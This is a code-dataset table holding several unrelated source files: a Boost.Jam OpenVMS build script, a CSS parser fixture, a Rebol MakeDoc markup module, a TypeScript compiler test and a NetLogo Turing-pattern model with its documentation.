content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
$ ! Copyright 2002-2003 Rene Rivera, Johan Nilsson.
$ !
$ ! 8-APR-2004 Boris Gubenko
$ ! Miscellaneous improvements.
$ !
$ ! 20-JAN-2015 Artur Shepilko
$ ! Adapt for jam 3.1.19
$ !
$ ! Distributed under the Boost Software License, Version 1.0.
$ ! (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
$ !
$ ! bootstrap build script for Jam
$ !
$ THIS_FACILITY = "BUILDJAM"
$
$ verify = f$trnlnm("VERIFY_''THIS_FACILITY'")
$ save_verify = f$verify(verify)
$
$ SAY := WRITE SYS$OUTPUT
$ !
$ ON WARNING THEN CONTINUE
$ ON ERROR THEN GOTO EXIT
$
$ BOOST_JAM_TOOLSET = "vmsdecc"
$ BOOST_JAM_CC = "CC"
$ BJAM_UPDATE = ""
$
$ ARGS = F$EDIT("''p1' ''p2' ''p3' ''p4'","TRIM,LOWERCASE")
$ ARGS_LEN = F$LENGTH(ARGS)
$
$ IF F$LOCATE("--update", ARGS) .NE. F$LENGTH(ARGS) THEN BJAM_UPDATE = "update"
$ IF BJAM_UPDATE .EQS. "update" -
.AND. F$SEARCH("[.bootstrap_vms]jam0.exe") .EQS. "" THEN BJAM_UPDATE = ""
$
$ IF BJAM_UPDATE .NES. "update"
$ THEN
$ GOSUB CLEAN
$
$ SAY "I|Creating bootstrap directory..."
$ CREATE /DIR [.bootstrap_vms]
$
$ !------------------
$ ! NOTE: Assume jamgram and jambase have been generated (true for fresh release).
$ ! Otherwise these need to be re-generated manually.
$ !------------------
$
$ SAY "I|Building bootstrap jam..."
$ !
$ CC_FLAGS = "/DEFINE=VMS /STANDARD=VAXC " + -
"/PREFIX_LIBRARY_ENTRIES=(ALL_ENTRIES) " + -
"/WARNING=DISABLE=(LONGEXTERN)" + -
"/OBJ=[.bootstrap_vms] "
$
$ CC_INCLUDE=""
$
$ SAY "I|Using compile flags: ", CC_FLAGS
$
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE command.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE compile.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE constants.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE debug.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE execcmd.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE frames.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE function.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE glob.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE hash.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE hdrmacro.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE headers.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE jam.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE jambase.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE jamgram.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE lists.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE make.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE make1.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE object.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE option.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE output.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE parse.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE pathsys.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE regexp.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE rules.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE scan.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE search.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE subst.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE timestamp.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE variable.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE modules.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE strings.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE filesys.c
$
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE execvms.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE pathvms.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE filevms.c
$
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE builtins.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE class.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE cwd.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE native.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE md5.c
$
$ CC_INCLUDE = "/INCLUDE=(""./modules"")"
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]set.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]path.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]regex.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]property-set.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]sequence.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]order.c
$
$ LIB /CREATE [.bootstrap_vms]jam0.olb [.bootstrap_vms]*.obj
$ LINK /EXEC=[.bootstrap_vms]jam0.exe -
[.bootstrap_vms]jam0.olb/INCLUDE=JAM/LIB
$
$ IF F$SEARCH("[.bootstrap_vms]*.obj") .NES. "" THEN -
DELETE /NOCONF /NOLOG [.bootstrap_vms]*.obj;*, *.olb;*
$ ENDIF
$
$ IF F$SEARCH("[.bootstrap_vms]jam0.exe") .NES. ""
$ THEN
$ IF BJAM_UPDATE .NES. "update"
$ THEN
$ SAY "I|Cleaning previous build..."
$ MCR [.bootstrap_vms]jam0.exe -f build.jam --toolset='BOOST_JAM_TOOLSET' 'ARGS' clean
$ ENDIF
$
$ SAY "I|Building Boost.Jam..."
$ MCR [.bootstrap_vms]jam0.exe -f build.jam --toolset='BOOST_JAM_TOOLSET' 'ARGS'
$ ENDIF
$
$
$EXIT:
$ sts = $STATUS
$ exit 'sts' + (0 * f$verify(save_verify))
$CLEAN: !GOSUB
$ !
$ IF F$SEARCH("[.bootstrap_vms]*.*") .NES. ""
$ THEN
$ SAY "I|Cleaning previous bootstrap files..."
$ !
$ SET FILE /PROT=(W:RWED) [.bootstrap_vms]*.*;*
$ DELETE /NOCONF /NOLOG [.bootstrap_vms]*.*;*
$ ENDIF
$ !
$ IF F$SEARCH("bootstrap_vms.dir") .NES. ""
$ THEN
$ SAY "I|Removing previous bootstrap directory..."
$ !
$ SET FILE /PROT=(W:RWED) bootstrap_vms.dir
$ DELETE /NOCONF /NOLOG bootstrap_vms.dir;
$ ENDIF
$ !
$ RETURN
| DIGITAL Command Language | 4 | MaxSac/build | src/engine/build_vms.com | [
"BSL-1.0"
] |
*|div {} | CSS | 1 | mengxy/swc | crates/swc_css_parser/tests/fixture/esbuild/misc/pUymwoCxUAxDqtaTC7CaOQ/input.css | [
"Apache-2.0"
] |
Rebol [
Title: "MakeDoc"
Date: 14-Jun-2013
Author: "Christopher Ross-Gill"
File: %makedoc.r3
Version: 2.100.0
Purpose: "Versatile plain-text document markup format"
Rights: http://opensource.org/licenses/Apache-2.0
Type: module
Name: rgchris.makedoc
Exports: [
load-doc make-doc
]
Needs: [
%as.r3 %match.r3 %rsp.r3
]
History: [
14-Jun-2013 2.100.0 "Conversion to R3-Alpha"
]
Notes: [
"Finite State Machine Object" [
Title: "Finite State Machine"
Author: "Gabriele Santilli"
Home: http://www.colellachiara.com/soft/MD3/fsm.html
]
]
Root: %../makedoc/
]
import module [
Title: "Amend"
Name: reb4me.amend
Exports: [amend]
][
ascii: charset ["^/^-" #"^(20)" - #"^(7E)"]
digit: charset [#"0" - #"9"]
upper: charset [#"A" - #"Z"]
lower: charset [#"a" - #"z"]
alpha: union upper lower
alphanum: union alpha digit
hex: union digit charset [#"A" - #"F" #"a" - #"f"]
symbol: file*: union alphanum charset "_-"
url-: union alphanum charset "!'*,-._~" ; "!*-._"
url*: union url- charset ":+%&=?"
space: charset " ^-"
ws: charset " ^-^/"
word1: union alpha charset "!&*+-.?_|"
word*: union word1 digit
html*: exclude ascii charset {&<>"}
para*: path*: union alphanum charset "!%'+-._"
extended: charset [#"^(80)" - #"^(FF)"]
chars: complement nochar: charset " ^-^/^@^M"
ascii+: charset [#"^(20)" - #"^(7E)"]
wiki*: complement charset [#"^(00)" - #"^(1F)" {:*.<>[]} #"{" #"}"]
name: union union lower digit charset "*!',()_-"
wordify-punct: charset "-_()!"
bin-charset: func [set [binary!] /local out] [
out: charset {}
foreach val set [insert out val]
out
]
ucs: complement charset [#"^(00)" - #"^(7F)"]
utf-8: use [utf-2 utf-3 utf-4 utf-5 utf-b] [
utf-2: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////w==}
; #{C0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDF}
utf-3: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//}
; #{E0E1E2E3E4E5E6E7E8E9EAEBECEDEEEF}
utf-4: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/w==}
; #{F0F1F2F3F4F5F6F7}
utf-5: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA=}
; #{F8F9FAFB}
utf-b: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAP//////////}
; #{
; 808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9F
; A0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBF
; }
[utf-2 1 utf-b | utf-3 2 utf-b | utf-4 3 utf-b | utf-5 4 utf-b]
]
inline: [ascii+ | utf-8]
text-row: [chars any [chars | space]]
text: [ascii | utf-8]
ident: [alpha 0 14 file*]
wordify: [alphanum 0 99 [wordify-punct | alphanum]]
word: [word1 0 25 word*]
number: [some digit]
integer: [opt #"-" number]
wiki: [some [wiki* | ucs]]
ws*: white-space: [some ws]
amend: func [rule [block!]] [
bind rule 'self
]
]
import module [
Title: "Make Doc"
Name: reb4me.makedoc
Exports: [load-doc make-doc] ; make-para
][
root: system/script/header/root
if all [
file? root
not find [#"/" #"~"] first root
][
root: join system/script/path root
]
load-next: func [string [string!] /local out] [
out: transcode/next to binary! string
out/2: skip string subtract length? string length? to string! out/2
out
]
load-scanpara: use [para!] [
para!: context amend [
para: copy []
emit: use [prev] [
func [data /after alt] [
all [alt in-word? data: alt]
prev: pick back tail para 1
case [
not string? data [append/only para data]
not string? prev [append para data]
true [append prev data para]
]
]
]
text: char: values: none
in-word?: false
in-word: [(in-word?: true)]
not-in-word: [(in-word?: false)]
string: use [mk ex] [
[
mk: {"} (
either error? try [
mk: load-next ex: mk
][
values: "="
][
ex: mk/2
values: reduce ['wiki mk/1]
]
) :ex
]
]
block: use [mk ex] [
[
mk: #"[" (
either error? try [
mk: load-next ex: mk
][
ex
values: "="
][
ex: mk/2
values: mk/1
]
) :ex ; ]
]
]
paren: use [mk ex] [
[
mk: #"(" (
either error? try [
mk: load-next ex: mk
][
ex
values: "="
][
ex: mk/2
values: mk/1
]
) :ex ; )
]
]
rule: none
scanpara: func [paragraph [string!]] [
clear para
parse/all paragraph rule
new-line/all para false
; probe para
copy para
]
]
load-scanpara: func [scanpara [file! url!]] [
if all [
scanpara: attempt [read scanpara]
scanpara: load/header scanpara
'paragraph = get in take scanpara 'type
][
make para! compose/only [rule: (amend scanpara)]
]
]
]
load-scanner: use [para! scanner!] [
scanner!: context amend [
doc: []
emit: func ['style data /verbatim] [
if string? data [
trim/tail data
unless verbatim [data: inline/scanpara data]
; unless verbatim [data: envelop data]
]
repend doc [style data]
]
inline: text: para: values: url-mark: none
term: [any space [newline | end]]
trim-each: [(foreach val values [trim/head/tail val])]
options: []
line: [any space copy text text-row term (trim/head/tail text)]
paragraph: [copy para [text-row any [newline text-row]] term]
lines: [any space paragraph]
indented: [some space opt text-row]
example: [
copy para some [indented | some newline indented]
(para: trim/auto para)
]
define: [copy text to " -" 2 skip [newline | any space] paragraph]
commas: [line (values: parse/all text ",") trim-each]
pipes: [line (values: parse/all text "|") trim-each]
block: [term (values: copy []) | line (values: any [attempt [load/all text] []])]
url-start: [url-mark: "http" opt "s" "://" opt "www."]
url-block: [:url-mark line (values: any [attempt [load/all text] copy []])]
rules: none
scandoc: func [document [string!]] [
clear doc
emit options options
parse/all document rules
new-line/skip/all doc true 2
doc
]
]
load-scanner: func [scandoc [file! url!] scanpara [file! url!]] [
if all [
not error? scandoc: try [read scandoc]
not none? scandoc
scandoc: load/header scandoc
'document = get in take scandoc 'type
][
scandoc: make scanner! compose/only [rules: (amend scandoc)]
if scandoc/inline: load-scanpara scanpara [
scandoc
]
]
]
]
fsm!: context [
initial: state: none
state-stack: []
goto-state: func [new-state [block!] retact [paren! none!]] [
insert/only insert/only state-stack: tail state-stack :state :retact
state: new-state
]
return-state: has [retact [paren! none!]] [
set [state retact] state-stack
state: any [state initial]
do retact
state-stack: skip clear state-stack -2
]
rewind-state: func [up-to [block!] /local retact stack] [
if empty? state-stack [return false]
stack: tail state-stack
retact: make block! 128
until [
stack: skip stack -2
append retact stack/2
if same? up-to stack/1 [
state: up-to
do retact
state-stack: skip clear stack -2
return true
]
head? stack
]
false
]
event: func [
evt [any-type!]
/local val ovr retact done?
][
if not block? state [exit]
until [
done?: yes
local: any [
find state evt
find state to get-word! type?/word evt
find state [default:]
]
if local [
parse local [
any [any-string! | set-word! | get-word!]
set val opt paren! (do val) [
'continue (done?: no)
|
'override set ovr word! (evt: to set-word! ovr done?: no)
|
none
][
'return (return-state)
|
'rewind? copy val some word! (
if not foreach word val [
if block? get/any word [
if rewind-state get word [break/return true]
]
false
][
done?: yes
]
)
|
set val word! set retact opt paren! (
either block? get/any val [goto-state get val :retact] [
done?: yes
]
)
|
none (done?: yes)
]
]
]
done?
]
]
init: func [initial-state [word! block!]] [
; _t_ "fsm_init"
if word? initial-state [
unless block? initial-state: get/any :initial-state [
make error! "Not a valid state"
]
]
clear state-stack: head state-stack
initial: state: initial-state
]
end: does [
; _t_ "fsm_end"
foreach [retact state] head reverse head state-stack [do retact]
]
]
load-emitter: use [emitter! para!] [
emitter!: context [
document: position: word: data: none
sections: context [
this: 0.0.0.0
reset: does [this: 0.0.0.0]
step: func [level /local bump mask] [
set [bump mask] pick [
[1.0.0.0 1.0.0.0]
[0.1.0.0 1.1.0.0]
[0.0.1.0 1.1.1.0]
[0.0.0.1 1.1.1.1]
] level
level: form this: this + bump * mask
clear find level ".0"
level
]
]
outline: func [doc [block!]] [
remove-each style doc: copy doc [
not find [sect1 sect2 sect3 sect4] style
]
doc
]
init-emitter: func [doc] [
sections/reset
foreach [word str] doc [
if w: find [sect1 sect2 sect3 sect4] word [
w: index? w
if w <= toc-levels [
sn: sections/step w
insert insert tail toc capture [make-heading/toc w sn copy/deep str] "<br>^/"
]
]
]
sections/reset
if no-title [emit toc state: normal]
]
toc: none
initialize: func [para [block!]] [
if string? pick para 1 [
insert para reduce [<initial> take pick para 1 </initial>]
]
para
]
no-indent: true
no-nums: true
make-heading: func [level num str /toc /local lnk] [
lnk: replace/all join "section-" num "." "-"
num: either no-nums [""] [join num pick [". " " "] level = 1]
either toc [
emit [{<a class="toc} level {" href="#} lnk {">}] emit-inline str emit [</a> newline]
][
emit [{<h} level { id="} lnk {">}] emit-inline str emit [{</h} level {>}]
]
]
emit-sect: func [level str /local sn] [
sn: sections/step level
make-heading level sn str
]
form-url: func [url [url!]] [
if parse url: form url amend [
copy url some [
some ascii
| change [
copy url ucs (url: join "%" enbase/base join #{} to integer! url/1 16)
] url | skip
]
][url]
]
hold-values: []
hold: func [value [any-type!]] [insert hold-values value value]
release: does [take hold-values]
out: {}
emit: func [value] [
insert tail out reduce value
]
states: value: options: none
inline: make fsm! []
emit-inline: func [
para [block!]
/with state [word! block!]
/local doc-position
][
doc-position: :position
unless block? state [
state: get in states any [:state 'inline]
]
inline/init state
forall para [
position: :para
set 'value para/1
inline/event :value
]
position: :doc-position
inline/end
]
raise: func [msg] [emit ["Emitter error: " msg]]
escape-html: :sanitize
inherit: func [parent-state new-directives] [
append new-directives parent-state
]
raise: func [msg] [
emit compose [{<ul class="attention"><li>} (msg) {</li></ul>}]
]
outline: make fsm! []
outline-do: func [doc [block!] state [block!]] [
outline/init state
forskip doc 2 [
position: :doc
set [word data] doc
outline/event to set-word! word
]
outline/end
]
generate: func [doc [block!]] [
clear hold-values
clear out
sections/reset
outline-do doc get in states 'initial
copy out
]
]
load-emitter: func [makedoc [file! url!]] [
if all [
makedoc: attempt [read makedoc]
makedoc: load/header makedoc
'emitter = get in take makedoc 'type
][
makedoc: make emitter! compose/only [states: context (makedoc)]
]
]
]
grammar!: context [
root: none
template: none
document: %document.r
paragraph: %paragraph.r
markup: %html.r
]
resolve: use [resolve-path] [
resolve-path: func [root [file! url!] target [none! file! url!]] [
case [
none? target [target]
url? target [target]
url? root [root/:target]
find/match target root [target]
target [root/:target]
]
]
resolve: func [options [object!]] [
options/root: any [options/root root]
options/document: resolve-path options/root options/document
options/paragraph: resolve-path options/root options/paragraph
options/markup: resolve-path options/root options/markup
if any [file? options/template url? options/template] [
options/template: resolve-path options/root options/template
]
options
]
]
load-doc: use [document! form-para] [
form-para: func [para [string! block!]] [
para: compose [(para)]
join "" collect [
foreach part para [
case [
string? part [keep part]
integer? part [keep form to char! part]
switch part [
<quot> [keep to string! #{E2809C}]
</quot> [keep to string! #{E2809D}]
<apos> [keep to string! #{E28098}]
</apos> [keep to string! #{E28099}]
][]
char? part [keep part]
]
]
]
]
document!: context [
options: source: text: document: values: none
outline: func [/level depth [integer!] /local doc] [
level: copy/part [sect1 sect2 sect3 sect4] min 4 max 1 any [depth 2]
remove-each [style para] doc: copy document [
not find level style
]
doc
]
title: has [title] [
if parse document [opt ['options skip] 'para set title block! to end] [
form-para title
]
]
render: func [/custom options [block! object! none!]] [
make-doc/custom self make self/options any [options []]
]
]
load-doc: func [
document [file! url! string! binary! block!]
/with model [none! block! object!]
/custom options [none! block! object!]
/local scanner
][
options: make grammar! any [options []]
resolve options
model: make document! any [model []]
model/options: options
model/values: make map! []
case/all [
any [file? document url? document] [
model/source: document
document: any [read document ""]
]
binary? document [
document: to string! document
]
string? document [
model/text: document
if scanner: load-scanner options/document options/paragraph [
document: scanner/scandoc document
]
]
block? document [
model/document: :document
model
]
]
]
]
make-doc: func [
document [url! file! string! binary! block! object!]
/with model [block! object!]
/custom options [block! object!]
/local template emitter
][
options: make grammar! any [options []]
resolve options
unless object? document [
document: load-doc/with/custom document model options
]
if object? document [
case [
all [
template: options/template
template: case/all [
file? template [
template: attempt [read template]
]
url? template [
template: attempt [read template]
]
binary? template [
template: to string! template
]
string? template [template]
]
][
document/options/template: none
render/with template [document]
]
emitter: load-emitter options/markup [
emitter/document: document
emitter/generate document/document
]
]
]
]
]
| Rebol | 4 | rgchris/Scripts | r3-alpha/makedoc.r3 | [
"Apache-2.0"
] |
// @target: es6
(class { static x = 0; });
| TypeScript | 3 | nilamjadhav/TypeScript | tests/cases/compiler/classExpressionWithStaticPropertiesES64.ts | [
"Apache-2.0"
] |
patches-own
[
new-color ;; currently, always either white or black
inner-neighbors ;; other cells in a circle around the cell
outer-neighbors ;; other cells in a ring around the cell (but usually not touching the cell)
]
to setup
clear-all
;; computes inner and outer neighbors in an ellipse around each cell
ask patches
[
set inner-neighbors ellipse-in inner-radius-x inner-radius-y
;; outer-neighbors needs more computation because we want only the cells in the circular ring
set outer-neighbors ellipse-ring outer-radius-x outer-radius-y inner-radius-x inner-radius-y
]
ifelse any? patches with [ count outer-neighbors = 0 ]
[ user-message word "It doesn't make sense that 'outer' is equal to or smaller than 'inner.' "
" Please reset the sliders and press Setup again."
stop]
[restart]
reset-ticks
end
;; this procedure sets approximately initial-density percent of the
;; cells white and the rest black; if initial-density is set at 50%
;; then about half the cells will be white and the rest black
to restart
ask patches
[ ifelse random-float 100.0 < initial-density
[ set pcolor white ]
[ set pcolor black ] ]
reset-ticks
end
to go
ask patches [ pick-new-color ]
ask patches [ set pcolor new-color ]
tick
end
to pick-new-color ;; patch procedure
let activator count inner-neighbors with [pcolor = white]
let inhibitor count outer-neighbors with [pcolor = white]
;; we don't need to multiply 'activator' by a coefficient because
;; the ratio variable keeps the proportion intact
let difference activator - ratio * inhibitor
ifelse difference > 0
[ set new-color white ]
[ if difference < 0
[ set new-color black ] ]
;; note that we did not deal with the case that difference = 0.
;; this is because we would then want cells not to change color.
end
;;; procedures for defining elliptical neighborhoods
to-report ellipse-in [x-radius y-radius] ;; patch procedure
report patches in-radius (max list x-radius y-radius)
with [1.0 >= ((xdistance myself ^ 2) / (x-radius ^ 2)) +
((ydistance myself ^ 2) / (y-radius ^ 2))]
end
to-report ellipse-ring [outx-radius outy-radius inx-radius iny-radius] ;; patch procedure
report patches in-radius (max list outx-radius outy-radius)
with [1.0 >= ((xdistance myself ^ 2) / (outx-radius ^ 2)) +
((ydistance myself ^ 2) / (outy-radius ^ 2))
and 1.0 < ((xdistance myself ^ 2) / (inx-radius ^ 2)) +
((ydistance myself ^ 2) / (iny-radius ^ 2))
]
end
;; The following two reporter give us the x and y distance magnitude.
;; you can think of a point at the tip of a triangle determining how much
;; "to the left" it is from another point and how far "over" it is from
;; that same point. These two numbers are important for computing total distances
;; in elliptical "neighborhoods."
;; Note that it is important to use the DISTANCEXY primitive and not
;; just take the absolute value of the difference in coordinates,
;; because DISTANCEXY handles wrapping around world edges correctly,
;; if wrapping is enabled (which it is by default in this model)
to-report xdistance [other-patch] ;; patch procedure
report distancexy [pxcor] of other-patch
pycor
end
to-report ydistance [other-patch] ;; patch procedure
report distancexy pxcor
[pycor] of other-patch
end
; Copyright 2003 Uri Wilensky.
; See Info tab for full copyright and license.
@#$#@#$#@
GRAPHICS-WINDOW
309
10
622
324
-1
-1
5.0
1
10
1
1
1
0
1
1
1
-30
30
-30
30
1
1
1
ticks
30.0
BUTTON
205
60
294
93
NIL
setup
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
BUTTON
218
254
289
287
NIL
go
T
1
T
OBSERVER
NIL
NIL
NIL
NIL
0
SLIDER
7
221
179
254
initial-density
initial-density
0
100
50.0
1
1
%
HORIZONTAL
SLIDER
7
257
180
290
ratio
ratio
0
2
0.35
0.01
1
NIL
HORIZONTAL
BUTTON
217
216
289
249
step
go
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
0
BUTTON
216
179
289
212
NIL
restart
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
SLIDER
8
37
180
70
inner-radius-x
inner-radius-x
0
10
3.0
1
1
cells
HORIZONTAL
SLIDER
8
72
180
105
inner-radius-y
inner-radius-y
0
10
3.0
1
1
cells
HORIZONTAL
SLIDER
7
106
180
139
outer-radius-x
outer-radius-x
0
10
6.0
1
1
cells
HORIZONTAL
SLIDER
7
141
179
174
outer-radius-y
outer-radius-y
0
10
6.0
1
1
cells
HORIZONTAL
@#$#@#$#@
## WHAT IS IT?
Does a single mechanism underlie such diverse patterns as the stripes on a zebra, the spots on a leopard, and the blobs on a giraffe? This model is a possible explanation of how the patterns on animals' skin self-organize. It was first proposed by Alan Turing. If the model is right, then even though the animals may appear to have altogether different patterns, the rules underlying the formation of these patterns are the same and only some of the parameters (the numbers that the rules work on) are slightly different.
Thinking of the formation of fur in terms of rules also helps us understand how offspring of animals may have the same type of pattern, but not the same exact pattern. This is because what they have inherited is the rules and the values rather than a fixed picture. The process by which the rules and values generate a pattern is affected by chance factors, so each individual's pattern is different, but as long as the offspring receive the same rules and values, their own fur will self organize into the same type of pattern as their parents'.
## HOW IT WORKS
We model the animal skin by a square array of many melanocytes (pigment cells) that are each in either of two states: colorful ('D' for differentiated) or not-colorful ('U' for undifferentiated). The state of a cell can flip between D and U. The color cells (the D's) secrete two types of 'morphogens': activators (A) and inhibitors (I). Activators, on their own, cause a central cell to become colorful; inhibitors, on their own, cause the central cell to become not colorful. These competing morphogens are secreted in all directions so you can think of each color cell as creating a puddle that grows around it, spreading to other cells.
Each cell, whether or not it is colorful, is itself the center of its own neighborhood. For now, suppose the neighborhood is a circle. Say this circular neighborhood has a radius of 6 cells. This means that the cell in the center can be affected by other cells that are as far as 6 cells away from it in any direction. So if there is a D cell within this circle and it is secreting morphogens then these morphogens will diffuse as far as this central cell (but a D cell 7 cells away will not directly or immediately affect it). Also, each cell has an inner circle of radius, say, 3 cells.
D cells within the inner circle each contributes morphogens of type A (activator) to the central cell. Between the inner circle and the perimeter of the outer circle we have a ring of cells that are more than 3 cells away from the center but 6 or less cells away from the center. Every D cell in this outer ring contributes morphogens of type I (inhibitor) to the central cell. So at every moment each cell is affected both by activator and inhibitor cells in its circle and the question is will it ultimately be activated and become colorful or inhibited and lose its color (or just remain the way it was). The logic is that if the power of the activators is bigger than the power of the inhibitors then the cell will become colorful and vice versa (and if the power is balanced then nothing happens). The idea of "power" is that it's not enough to know how many morphogens there are of each type affecting a cell but one must multiply each cell by its "power" (or you can think of power in terms of the concentration of the morphogens in the inner and outer neighborhoods). Another idea is that since we'll be multiplying both types of morphogens by their power, we might as well just call the power of the activators "1" and the power of the inhibitors "w * 1" or just w. So w is the ratio between the power of the inhibitors and the activators. If w is bigger than 1 that means the power of the inhibitors is greater than that of the activators (for instance, if w = 2 then the inhibitors are each double as strong as each of the activators and if w = 0.5 then the inhibitors are half as strong as the activators). If w = 0.5 and if we have as many inhibitors as we have activators that are affecting the central cell, we would logically assume that the center cells would be more activated than inhibited and so would probably become (or remain) colorful on that step. 
(A tricky point to notice is that while a certain D-cell is activating a neighboring cell, this same D-cell can be inhibiting a different cell further away.)
Here are the rules that summarize what we've been discussing: count up all the D cells in the ring and call this number D*I (for instance 2 inhibitors), and count up all the D cells in the circle of radius three and call this number D*A (for instance, 5 activators). Then compute D*A - w*D*I, and:
* if it is > 0, set the central cell to D
* if it is < 0, set the central cell to U
* if it is = 0, leave the central cell unchanged
Note that this computation happens to all cells at the same time. After the first step and once the cells have been set accordingly, the entire business starts over at the next step. Once again, the cells are counted up according to the same rule. The rules have not changed but because some of the D cells are now U and vice versa we might get different counts and because of that -- different results of the "fight" between the A and I morphogens.
So what you see is that from step to step the individual cells often change from white (representing D or color cells) to black (representing U or no-color cells) and the overall impression is that the configuration of white and black changes as a whole. But these configurations are not random. You will see how these configurations often take form. Understanding how each cell behaves, as we have explained above, can help understanding how these global patterns take form.
All these explanations were for circular neighborhoods. In this model, the neighborhoods may be elliptical instead of circular. This is needed to produce stripes instead of spots.
## HOW TO USE IT
In order that your first experiment will more-or-less match the explanations above, you should choose to set the initial-density slider to 50% (that gives each cell an equal chance of being white or black to start with and so the whole window will be roughly 50% white), set the INNER-RADIUS-X and INNER-RADIUS-Y sliders to 3 and the OUTER-RADIUS-X and OUTER-RADIUS-Y sliders to 6, and set RATIO to 0.35 (that means the I morphogens are 35% as powerful as the A morphogens). Now press SETUP. (In later experiments you are welcome to change those settings in various combinations.) It will take a while to complete. If you press STEP the model will advance a single step. If you press GO the model will keep stepping indefinitely.
It takes a while for the patches to determine their neighborhoods. Because of this, only press SETUP when you change the radius sliders. If you only change the INITIAL-DENSITY and RATIO sliders or if you'd like to run the model again with the same settings, press RESTART instead of SETUP. The RESTART button doesn't ask the patches to recalculate their neighborhoods.
## THINGS TO NOTICE
As the model runs, patterns may begin to emerge. Eventually, they stabilize. (Well, sometimes the model will run into an endless flip-flop between two states, but we could call that dynamic stability.) Even when it seems to come to a halt, the model is still running and executing the commands and carrying out the computations, but nothing is changing visibly. This is because for each and every cell the power of activators is equal to that of the inhibitors, so nothing changes.
## THINGS TO TRY
Run the model with different INITIAL-DENSITY settings. How, if at all, does the value of the INITIAL-DENSITY affect the emergent pattern? Do you get the same pattern? Do you get a different pattern? Does it take longer?
Note how fragile the self organization of the cells is to slight changes in parameters. If you hold all other factors and slightly change just the RATIO, from trial to trial, you will note that for small ratios you will invariably get completely white fur and for high ratios you will invariably get completely black fur (why is that?). For ratios in between it fluctuates. That happens partially because the initial setting of black/white coloration has a random element to it (see the RESTART procedure in the code).
Try changing the sliders to have different values in the X and Y directions.
## EXTENDING THE MODEL
